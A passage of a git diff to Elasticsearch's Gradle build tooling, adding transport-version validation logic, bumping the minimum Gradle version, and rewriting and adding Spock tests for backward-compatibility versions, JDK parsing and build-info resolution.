(lastId.id().complete() != upperBound.id().complete()) { + throwUpperBoundFailure( + upperBound, + "has id " + + upperBound.id() + + " from [" + + upperBound.name() + + "] with base " + + upperBound.id().base() + + " but another id " + + lastId.id().complete() + + " from [" + + lastId.definition().name() + + "] is later for that base" + ); + } + + TransportVersionUpperBound existingUpperBound = getResources().get().getUpperBoundFromMain(upperBound.branch()); + if (existingUpperBound != null) { + if (upperBound.id().patch() != 0 && upperBound.id().base() != existingUpperBound.id().base()) { + throwUpperBoundFailure( + upperBound, + "modifies base id from " + existingUpperBound.id().base() + " to " + upperBound.id().base() + ); + } + } + } + + private void validateBase(int base, List ids) { + // TODO: switch this to a fully dense check once all existing transport versions have been migrated + IdAndDefinition previous = ids.getLast(); + for (int ndx = ids.size() - 2; ndx >= 0; --ndx) { + IdAndDefinition current = ids.get(ndx); + + if (previous.id().equals(current.id())) { + Path existingDefinitionPath = getResources().get().getReferableDefinitionRepositoryPath(previous.definition); + throwDefinitionFailure( + current.definition(), + "contains id " + current.id + " already defined in [" + existingDefinitionPath + "]" + ); + } + + if (previous.id().complete() - 1 != current.id().complete()) { + throw new IllegalStateException( + "Transport version base id " + base + " is missing patch ids between " + current.id() + " and " + previous.id() + ); + } + previous = current; + } + } + + private void validateLargestIdIsUsed( + Map upperBounds, + Map allDefinitions + ) { + // first id is always the highest within a definition, and validated earlier + // note we use min instead of max because the id comparator is in descending order + var highestDefinition = allDefinitions.values().stream().min(Comparator.comparing(d -> d.ids().get(0))).get(); + var highestId = highestDefinition.ids().get(0); + + for (var upperBound : upperBounds.values()) { + if (upperBound.id().equals(highestId)) { + return; + } + } + + throwDefinitionFailure( + highestDefinition, + "has the highest transport version id [" + highestId + "] but is not present in any upper bounds files" + ); + } + + private void throwDefinitionFailure(TransportVersionDefinition definition, String message) { + Path relativePath = getResources().get().getReferableDefinitionRepositoryPath(definition); + throw new VerificationException("Transport version definition file [" + relativePath + "] " + message); + } + + private void throwUpperBoundFailure(TransportVersionUpperBound upperBound, String message) { + Path relativePath = getResources().get().getUpperBoundRepositoryPath(upperBound); + throw new VerificationException("Transport version upper bound file [" + relativePath + "] " + message); + } +} diff --git a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java index 5d7386e2c2150..7120a5f907ddb 100644 --- a/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java +++ b/build-tools-internal/src/main/java/org/elasticsearch/gradle/internal/util/DependenciesUtils.java @@ -66,7 +66,7 @@ public static FileCollection thirdPartyDependenciesView(Configuration configurat .stream() .filter(dep -> dep instanceof ResolvedDependencyResult) .map(dep -> (ResolvedDependencyResult) dep) - .filter(dep -> dep.getResolvedVariant().getDisplayName() == ShadowBasePlugin.COMPONENT_NAME) + .filter(dep -> dep.getResolvedVariant().getDisplayName() == ShadowBasePlugin.SHADOW) .filter(dep -> dep.getSelected() instanceof ResolvedComponentResult) .map(dep -> dep.getSelected().getId()) .collect(Collectors.toSet()) diff --git a/build-tools-internal/src/main/resources/checkstyle_suppressions.xml b/build-tools-internal/src/main/resources/checkstyle_suppressions.xml index 5fdfebf6849e7..98ded638773ce 100644 --- a/build-tools-internal/src/main/resources/checkstyle_suppressions.xml +++ b/build-tools-internal/src/main/resources/checkstyle_suppressions.xml @@ -37,6 +37,7 @@ + diff --git a/build-tools-internal/src/main/resources/minimumGradleVersion b/build-tools-internal/src/main/resources/minimumGradleVersion index 4dd804f10624c..c9277c5a601f8 100644 --- a/build-tools-internal/src/main/resources/minimumGradleVersion +++ b/build-tools-internal/src/main/resources/minimumGradleVersion @@ -1 +1 @@ -8.14.2 \ No newline at end of file +9.0.0 \ No newline at end of file diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy index a662a76db4da7..09f1f12dada77 100644 --- a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/BwcVersionsSpec.groovy @@ -13,33 +13,40 @@ import spock.lang.Specification import org.elasticsearch.gradle.Version import org.elasticsearch.gradle.internal.BwcVersions.UnreleasedVersionInfo +import org.elasticsearch.gradle.internal.info.DevelopmentBranch class BwcVersionsSpec extends Specification { - List versionLines = [] + List versions = [] def "current version is next major"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('9.0.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('9.0.0') when: - def bwc = new BwcVersions(versionLines, v('9.0.0'), ['main', '8.x', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('9.0.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.10') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.x', ':distribution:bwc:minor'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:major3'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:major2'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.x', ':distribution:bwc:major1'), (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.17.0'), v('9.0.0')] @@ -48,29 +55,36 @@ class BwcVersionsSpec extends Specification { def "current version is next major with staged minor"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') when: - def bwc = new BwcVersions(versionLines, v('9.0.0'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('9.0.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.10'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:staged'), - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution:bwc:minor'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:major4'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:major3'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:major2'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution:bwc:major1'), (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0')] @@ -79,31 +93,39 @@ class BwcVersionsSpec extends Specification { def "current version is next major with two staged minors"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.16.2', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.17.1', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('8.19.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.1.0', '10.1.0') + addVersion('7.17.10') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.16.2') + addVersion('8.17.0') + addVersion('8.17.1') + addVersion('8.18.0') + addVersion('8.19.0') + addVersion('9.0.0') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.x', '8.18', '8.17', '8.16', '7.17']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main', '9.1.0'), + branch('9.0', '9.0.0'), + branch('8.x', '8.19.0'), + branch('8.18', '8.18.0'), + branch('8.17', '8.17.1'), + branch('8.16', '8.16.2'), + branch('7.17', '7.17.10') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.16.2')): new UnreleasedVersionInfo(v('8.16.2'), '8.16', ':distribution:bwc:bugfix2'), - (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:bugfix'), - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:staged2'), - (v('8.19.0')): new UnreleasedVersionInfo(v('8.19.0'), '8.x', ':distribution:bwc:minor'), - (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:staged'), + (v('8.16.2')): new UnreleasedVersionInfo(v('8.16.2'), '8.16', ':distribution:bwc:major4'), + (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:major3'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major2'), + (v('8.19.0')): new UnreleasedVersionInfo(v('8.19.0'), '8.x', ':distribution:bwc:major1'), + (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.19.0'), v('9.0.0'), v('9.1.0')] @@ -112,22 +134,26 @@ class BwcVersionsSpec extends Specification { def "current version is first new minor in major series"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.1.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main','9.1.0'), + branch('9.0', '9.0.0'), + branch('8.18', '8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:staged'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.0')): new UnreleasedVersionInfo(v('9.0.0'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.1.0')] @@ -136,23 +162,27 @@ class BwcVersionsSpec extends Specification { def "current version is new minor with single bugfix"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.0.1', '10.0.0') - addVersion('9.1.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.0.1') + addVersion('9.1.0') when: - def bwc = new BwcVersions(versionLines, v('9.1.0'), ['main', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.1.0'), versions, [ + branch('main','9.1.0'), + branch('9.0','9.0.1'), + branch('8.18','8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:bugfix'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:minor1'), (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.0.1'), v('9.1.0')] @@ -161,25 +191,30 @@ class BwcVersionsSpec extends Specification { def "current version is new minor with single bugfix and staged minor"() { given: - addVersion('7.17.10', '8.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') - addVersion('9.0.0', '10.0.0') - addVersion('9.0.1', '10.0.0') - addVersion('9.1.0', '10.0.0') - addVersion('9.2.0', '10.0.0') + addVersion('7.17.10') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') + addVersion('9.0.0') + addVersion('9.0.1') + addVersion('9.1.0') + addVersion('9.2.0') when: - def bwc = new BwcVersions(versionLines, v('9.2.0'), ['main', '9.1', '9.0', '8.18']) + def bwc = new BwcVersions(v('9.2.0'), versions, [ + branch('main','9.2.0'), + branch('9.1','9.1.0'), + branch('9.0','9.0.1'), + branch('8.18', '8.18.0') + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:maintenance'), - (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:bugfix'), - (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), '9.1', ':distribution:bwc:staged'), + (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.18', ':distribution:bwc:major1'), + (v('9.0.1')): new UnreleasedVersionInfo(v('9.0.1'), '9.0', ':distribution:bwc:minor2'), + (v('9.1.0')): new UnreleasedVersionInfo(v('9.1.0'), '9.1', ':distribution:bwc:minor1'), (v('9.2.0')): new UnreleasedVersionInfo(v('9.2.0'), 'main', ':distribution'), ] bwc.wireCompatible == [v('8.18.0'), v('9.0.0'), v('9.0.1'), v('9.1.0'), v('9.2.0')] @@ -188,30 +223,37 @@ class BwcVersionsSpec extends Specification { def "current version is next minor"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.17.1', '9.10.0') - addVersion('8.18.0', '9.10.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.17.1') + addVersion('8.18.0') when: - def bwc = new BwcVersions(versionLines, v('8.18.0'), ['main', '8.x', '8.17', '8.16', '7.17']) + def bwc = new BwcVersions(v('8.18.0'), versions, [ + branch('main', '9.1.0'), + branch('9.0', '9.0.1'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.1'), + branch('8.16', '8.16.1'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix2'), - (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:bugfix'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:minor2'), + (v('8.17.1')): new UnreleasedVersionInfo(v('8.17.1'), '8.17', ':distribution:bwc:minor1'), (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1'), v('8.17.0'), v('8.17.1'), v('8.18.0')] @@ -220,30 +262,37 @@ class BwcVersionsSpec extends Specification { def "current version is new minor with staged minor"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') - addVersion('8.17.0', '9.10.0') - addVersion('8.18.0', '9.10.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') + addVersion('8.17.0') + addVersion('8.18.0') when: - def bwc = new BwcVersions(versionLines, v('8.18.0'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.18.0'), versions, [ + branch('main', '9.0.0'), + branch('8.x', '8.18.0'), + branch('8.17', '8.17.0'), + branch('8.16', '8.16.1'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix2'), - (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:bugfix'), - (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:staged'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:minor3'), + (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution:bwc:minor2'), + (v('8.17.0')): new UnreleasedVersionInfo(v('8.17.0'), '8.17', ':distribution:bwc:minor1'), (v('8.18.0')): new UnreleasedVersionInfo(v('8.18.0'), '8.x', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1'), v('8.17.0'), v('8.18.0')] @@ -252,26 +301,33 @@ class BwcVersionsSpec extends Specification { def "current version is first bugfix"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') - addVersion('8.16.0', '9.10.0') - addVersion('8.16.1', '9.10.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') + addVersion('8.16.0') + addVersion('8.16.1') when: - def bwc = new BwcVersions(versionLines, v('8.16.1'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.16.1'), versions, [ + branch('main','9.0.1'), + branch('8.x','8.18.0'), + branch('8.17','8.17.0'), + branch('8.16','8.16.1'), + branch('8.15','8.15.2'), + branch('7.17','7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), - (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:bugfix'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), + (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution:bwc:minor1'), (v('8.16.1')): new UnreleasedVersionInfo(v('8.16.1'), '8.16', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2'), v('8.16.0'), v('8.16.1')] @@ -280,37 +336,46 @@ class BwcVersionsSpec extends Specification { def "current version is second bugfix"() { given: - addVersion('7.16.3', '8.9.0') - addVersion('7.17.0', '8.9.0') - addVersion('7.17.1', '8.9.0') - addVersion('8.14.0', '9.9.0') - addVersion('8.14.1', '9.9.0') - addVersion('8.14.2', '9.9.0') - addVersion('8.15.0', '9.9.0') - addVersion('8.15.1', '9.9.0') - addVersion('8.15.2', '9.9.0') + addVersion('7.16.3') + addVersion('7.17.0') + addVersion('7.17.1') + addVersion('8.14.0') + addVersion('8.14.1') + addVersion('8.14.2') + addVersion('8.15.0') + addVersion('8.15.1') + addVersion('8.15.2') when: - def bwc = new BwcVersions(versionLines, v('8.15.2'), ['main', '8.x', '8.17', '8.16', '8.15', '7.17']) + def bwc = new BwcVersions(v('8.15.2'), versions, [ + branch('main', '9.0.1'), + branch('8.x', '8.18.1'), + branch('8.17', '8.17.2'), + branch('8.16', '8.16.10'), + branch('8.15', '8.15.2'), + branch('7.17', '7.17.1'), + ]) def unreleased = bwc.unreleased.collectEntries { [it, bwc.unreleasedInfo(it)] } then: unreleased == [ - (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:maintenance'), + (v('7.17.1')): new UnreleasedVersionInfo(v('7.17.1'), '7.17', ':distribution:bwc:major1'), (v('8.15.2')): new UnreleasedVersionInfo(v('8.15.2'), '8.15', ':distribution'), ] bwc.wireCompatible == [v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2')] bwc.indexCompatible == [v('7.16.3'), v('7.17.0'), v('7.17.1'), v('8.14.0'), v('8.14.1'), v('8.14.2'), v('8.15.0'), v('8.15.1'), v('8.15.2')] } - private void addVersion(String elasticsearch, String lucene) { - def es = Version.fromString(elasticsearch) - def l = Version.fromString(lucene) - versionLines << " public static final Version V_${es.major}_${es.minor}_${es.revision} = new Version(0000000, org.apache.lucene.util.Version.LUCENE_${l.major}_${l.minor}_${l.revision});".toString() + private void addVersion(String elasticsearch) { + versions.add(Version.fromString(elasticsearch)) } private Version v(String version) { return Version.fromString(version) } + private DevelopmentBranch branch(String name, String version) { + return new DevelopmentBranch(name, v(version)) + } + } diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy new file mode 100644 index 0000000000000..72aebda2e0b80 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/JdkSpec.groovy @@ -0,0 +1,46 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal + +import spock.lang.Specification + +import org.gradle.api.artifacts.Configuration +import org.gradle.api.model.ObjectFactory +import org.gradle.api.provider.Property + +class JdkSpec extends Specification { + + def "jdk version is parsed correctly"() { + given: + Jdk jdk = newJdk() + + when: + jdk.setVersion(version) + then: + jdk.getBaseVersion() == baseVersion + jdk.getBuild() == buildNumber + + where: + version | baseVersion | major | buildNumber + "25-ea+30" | "25-ea+30" | "25" | "30" + "26-ea+6" | "26-ea+6" | "26" | "6" + } + + Object newJdk(String name = "jdk") { + Configuration configuration = Mock() + _ * configuration.getName() >> name + "Config" + + ObjectFactory objectFactory = Mock() + Property stringProperty = Mock() + _ * objectFactory.property(String.class) >> stringProperty + + return new Jdk(name, configuration, objectFactory) + } +} diff --git a/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy new file mode 100644 index 0000000000000..bbb58041eee72 --- /dev/null +++ b/build-tools-internal/src/test/groovy/org/elasticsearch/gradle/internal/info/GlobalBuildInfoPluginSpec.groovy @@ -0,0 +1,111 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the "Elastic License + * 2.0", the "GNU Affero General Public License v3.0 only", and the "Server Side + * Public License v 1"; you may not use this file except in compliance with, at + * your election, the "Elastic License 2.0", the "GNU Affero General Public + * License v3.0 only", or the "Server Side Public License, v 1". + */ + +package org.elasticsearch.gradle.internal.info + +import groovy.json.JsonOutput +import spock.lang.Specification +import spock.lang.TempDir + +import org.elasticsearch.gradle.Version +import org.elasticsearch.gradle.internal.BwcVersions +import org.gradle.api.Project +import org.gradle.api.provider.Provider +import org.gradle.api.provider.ProviderFactory +import org.gradle.testfixtures.ProjectBuilder + +import java.nio.file.Path + +class GlobalBuildInfoPluginSpec extends Specification { + + @TempDir + File projectRoot + + Project project + + def setup() { + project = ProjectBuilder.builder() + .withProjectDir(projectRoot) + .withName("bwcTestProject") + .build() + project = Spy(project) + project.getRootProject() >> project + + File buildToolsInternalDir = new File(projectRoot, "build-tools-internal") + buildToolsInternalDir.mkdirs() + new File(buildToolsInternalDir, "version.properties").text = """ + elasticsearch = 9.1.0 + lucene = 10.2.2 + + bundled_jdk_vendor = openjdk + bundled_jdk = 24+36@1f9ff9062db4449d8ca828c504ffae90 + minimumJdkVersion = 21 + minimumRuntimeJava = 21 + minimumCompilerJava = 21 + """ + File versionFileDir = new File(projectRoot, "server/src/main/java/org/elasticsearch") + versionFileDir.mkdirs() + new File(versionFileDir, "Version.java").text = """ + package org.elasticsearch; + public class Version { + public static final Version V_8_17_8 = new Version(8_17_08_99); + public static final Version V_8_18_0 = new Version(8_18_00_99); + public static final Version V_8_18_1 = new Version(8_18_01_99); + public static final Version V_8_18_2 = new Version(8_18_02_99); + public static final Version V_8_18_3 = new Version(8_18_03_99); + public static final Version V_8_19_0 = new Version(8_19_00_99); + public static final Version V_9_0_0 = new Version(9_00_00_99); + public static final Version V_9_0_1 = new Version(9_00_01_99); + public static final Version V_9_0_2 = new Version(9_00_02_99); + public static final Version V_9_0_3 = new Version(9_00_03_99); + public static final Version V_9_1_0 = new Version(9_01_00_99); + public static final Version CURRENT = V_9_1_0; + + } + """ + } + + def "resolve unreleased versions from branches file set by Gradle property"() { + given: + ProviderFactory providerFactorySpy = Spy(project.getProviders()) + Path branchesJsonPath = projectRoot.toPath().resolve("myBranches.json") + 